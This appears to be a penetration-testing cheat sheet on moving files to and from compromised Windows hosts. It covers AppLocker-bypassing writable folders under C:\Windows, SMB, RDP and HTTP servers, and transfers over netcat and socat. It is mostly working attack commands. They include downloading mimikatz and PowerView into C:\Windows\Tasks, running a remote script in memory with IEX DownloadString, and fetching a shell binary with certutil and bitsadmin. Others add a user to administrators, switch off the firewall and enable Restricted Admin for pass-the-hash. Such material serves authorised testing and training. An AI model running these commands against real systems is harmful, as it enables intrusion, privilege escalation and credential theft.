Placing files in writeable paths
The following folders are writable by normal (non-admin) users by default. The exact set depends on the Windows build; this list was taken from Windows 10 1803. They matter because AppLocker's default executable rule allows everything under C:\Windows, so a user-writable folder there is both a drop location and a place a payload can run from.
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (only present after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
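Because the list above is build-specific, confirm on the target which candidates are really writable for the account you hold before dropping anything. This is an added check, not part of the original page: it probes every candidate by creating and deleting a small file, which also catches deny ACEs and integrity-label restrictions that a quick icacls glance misses. Paths are built from $env:SystemRoot; the candidate list is the one above.

```powershell
# Added example (not from the original page): probe the well-known
# user-writable folders under %SystemRoot% on this build, as the current user.
$candidates = @(
    "$env:SystemRoot\Tasks",
    "$env:SystemRoot\Temp",
    "$env:SystemRoot\tracing",
    "$env:SystemRoot\Registration\CRMLog",
    "$env:SystemRoot\System32\FxsTmp",
    "$env:SystemRoot\System32\com\dmp",
    "$env:SystemRoot\System32\Microsoft\Crypto\RSA\MachineKeys",
    "$env:SystemRoot\System32\spool\PRINTERS",
    "$env:SystemRoot\System32\spool\SERVERS",
    "$env:SystemRoot\System32\spool\drivers\color",
    "$env:SystemRoot\System32\Tasks\Microsoft\Windows\SyncCenter",
    "$env:SystemRoot\System32\Tasks_Migrated",
    "$env:SystemRoot\SysWOW64\FxsTmp",
    "$env:SystemRoot\SysWOW64\com\dmp",
    "$env:SystemRoot\SysWOW64\Tasks\Microsoft\Windows\SyncCenter",
    "$env:SystemRoot\SysWOW64\Tasks\Microsoft\Windows\PLA\System"
)

function Test-DirWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return 'missing' }
    # Probe with a real write: ACL inspection misses deny ACEs and
    # mandatory-integrity labels; an actual CreateFile does not.
    $probe = Join-Path $Path ('probe_' + [guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [IO.File]::WriteAllBytes($probe, [byte[]](1..4))
        # Some of these folders allow create but not delete; if this fails
        # the probe file stays behind, so note its name for cleanup.
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return 'writable'
    } catch {
        return 'denied'
    }
}

foreach ($dir in $candidates) {
    '{0,-9} {1}' -f (Test-DirWritable -Path $dir), $dir
}
```

Run it as the low-privileged user you actually control; results differ between accounts. A result of writable only means you can place a file there; whether it executes still depends on the AppLocker or WDAC policy in force.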
SMB
On Kali, extract the tools.zip archive to a directory, change into it and run one of the following to serve it as an SMB share named tools:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .
python /usr/share/doc/python-impacket/examples/smbserver.py tools .
With SMB2 support (required for current Windows clients, which ship with the SMB1 client disabled):
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support tools $(pwd)
To copy files from Kali to Windows:
copy \\192.168.1.11\tools\file.ext file.ext
To copy files from Windows to Kali:
copy file.ext \\192.168.1.11\tools\file.ext
Connecting from Windows to Kali SMB
# Kali - host SMB share
$ python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support [sharename] [/path/to/share] # set up local share
# Target - connect to share
cmd> net view \\[kali] # view remote shares
cmd> net use \\[kali]\[share] # connect to share
cmd> copy \\[kali]\[share]\[src_file] [/path/to/dest_file] # copy file
Recent Windows builds reject unauthenticated guest access to SMB shares (net use fails with an error about guest access being blocked by policy). In that case start smbserver.py with -username [user] -password [pass] and connect with net use \\[kali]\[share] /user:[user] [pass].
RDP
Enable RDP with PowerShell:
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
or (reg.exe does not understand the HKLM: drive syntax, so the key is written without the colon)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Connect using xfreerdp:
xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<TARGET_IP>
proxychains xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<TARGET_IP>
If RDP is available (or we can enable it), we can add our low-privileged user to the administrators group and then spawn an administrator command prompt via the GUI:
net localgroup administrators <username> /add
Enable RDP and add the user to the Remote Desktop Users group:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" alice /add
DisableRestrictedAdmin set to 0 turns on Restricted Admin mode, which lets a local administrator log on over RDP with only the NTLM hash (xfreerdp /pth:<hash>). Turning the whole firewall off is noisy; Enable-NetFirewallRule -DisplayGroup "Remote Desktop" from above opens only the RDP rule group.
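The steps above as one script, added here and not part of the original page: it enables RDP for a single account with the smallest footprint (RDP rule group only, no firewall shutdown), verifies the result, and records the original state so it can be reverted at the end of the engagement. It assumes an elevated PowerShell on the target; alice is a placeholder for an existing local account.

```powershell
# Added example (not from the original page): enable RDP for one account,
# verify it, and revert to the recorded original state when done.
$TsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

function Enable-RdpAccess {
    param([string]$Account)
    # Record what was there so the revert restores it rather than blindly
    # disabling RDP on a host where it was already in use.
    $script:OrigDeny  = (Get-ItemProperty -Path $TsKey -Name fDenyTSConnections).fDenyTSConnections
    $script:OrigRules = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' |
                          Where-Object { $_.Enabled -eq 'True' } | ForEach-Object Name)
    Set-ItemProperty -Path $TsKey -Name fDenyTSConnections -Value 0 -Type DWord
    # Open only the RDP rule group; 'netsh advfirewall set allprofiles state off' is far louder
    Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    # Remote Desktop Users membership is enough to log on; admin rights are a separate decision
    Add-LocalGroupMember -Group 'Remote Desktop Users' -Member $Account -ErrorAction SilentlyContinue
}

function Test-RdpReady {
    $deny  = (Get-ItemProperty -Path $TsKey -Name fDenyTSConnections).fDenyTSConnections
    $lsn   = Get-NetTCPConnection -LocalPort 3389 -State Listen -ErrorAction SilentlyContinue
    $rules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' | Where-Object { $_.Enabled -eq 'True' }
    [pscustomobject]@{
        ConnectionsAllowed = ($deny -eq 0)
        Listening3389      = [bool]$lsn       # TermService can take a moment to bind
        FirewallRulesOpen  = @($rules).Count
    }
}

function Disable-RdpAccess {
    param([string]$Account)
    Remove-LocalGroupMember -Group 'Remote Desktop Users' -Member $Account -ErrorAction SilentlyContinue
    Disable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    if ($script:OrigRules.Count) { Enable-NetFirewallRule -Name $script:OrigRules }
    Set-ItemProperty -Path $TsKey -Name fDenyTSConnections -Value $script:OrigDeny -Type DWord
}

Enable-RdpAccess -Account 'alice'
Test-RdpReady
# when finished: Disable-RdpAccess -Account 'alice'
```

If Test-RdpReady reports ConnectionsAllowed but no listener, give TermService a few seconds or restart it; if the host enforces NLA (the default), xfreerdp still needs a valid password or, with Restricted Admin enabled, an NTLM hash via /pth.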
Powershell .ps1
This is a simple PowerShell script to pull several files from a Kali web server into a user-writable directory:
$baseUrl = "http://192.168.119.139/"
$fileNames = @("PowerUP.ps1", "PowerView.ps1", "mimikatz.exe", "winPEASany.exe")
$downloadPath = "C:\Windows\Tasks"   # user-writable, see the list above
foreach ($fileName in $fileNames) {
    $url = $baseUrl + $fileName
    $filePath = Join-Path $downloadPath $fileName
    # -UseBasicParsing avoids the Internet Explorer engine dependency on Windows PowerShell 5.1
    Invoke-WebRequest -Uri $url -OutFile $filePath -UseBasicParsing
    Write-Host "Downloaded $fileName to $filePath"
}
Powershell
# Download file from remote to local
powershell -c "(New-Object Net.WebClient).DownloadFile('http://[host]:[port]/[file]','[file]')"
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
# Execute remote PS script in memory (nothing is written to disk)
PS> IEX (New-Object System.Net.WebClient).DownloadString('http://[kali]/[script].ps1')
IWR
From Windows:
IWR -Uri http://KALI_IP:PORT/FILE -OutFile C:\Path\To\File
Certutil
From Kali (serves the current directory):
python3 -m http.server 9999
From Windows CMD:
certutil -urlcache -split -f http://<kali_ip>:9999/shell_445.exe C:\Windows\Tasks\shell_445.exe
certutil is a well-known LOLBin and downloads through it are commonly flagged by AV/EDR; it also keeps a copy in the URL cache, which certutil -urlcache <url> delete removes.
Bitsadmin
From Windows cmd ([dest_file] must be an absolute path; BITS rejects relative ones):
bitsadmin /transfer badthings http://[kali]:[port]/[src_file] [dest_file]
SSH server
Let's move files with SCP. Start the SSH server on Kali if it is not already running:
sudo systemctl start ssh
# Run on Kali: pull a file from a target that runs an SSH server
scp <username>@<target_ip>:C:/Windows/Tasks/file.txt .
# Run on the target: push a file to the Kali SSH server
scp /tmp/linpeas.out kali@<kali_ip>:/home/kali/Offensive/PGs/
Netcat
Windows (listen and write whatever arrives to a file):
C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
Kali (connect and send the file):
kali@kali:~$ locate wget.exe
/usr/share/windows-resources/binaries/wget.exe
kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
(UNKNOWN) [10.11.0.22] 4444 (?) open
The connection is received by Netcat on the Windows machine as shown below:
C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
connect to [10.11.0.22] from (UNKNOWN) [10.11.0.4] 43459
^C
C:\Users\offsec>
Netcat has no end-of-file signal, so the Windows listener keeps running after the bytes have arrived: press Ctrl-C once the Kali side has exited, then compare Get-FileHash incoming.exe with sha256sum on Kali before running the binary.
Socat
Alice wants to share a file with Bob:
kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Bob downloads the file from Alice's host:
C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create
Servers
Python2
python -m SimpleHTTPServer 7331
Python3
python3 -m http.server 7331
PHP
Ruby
ruby -run -e httpd . -p 9000
Busybox
busybox httpd -f -p 10000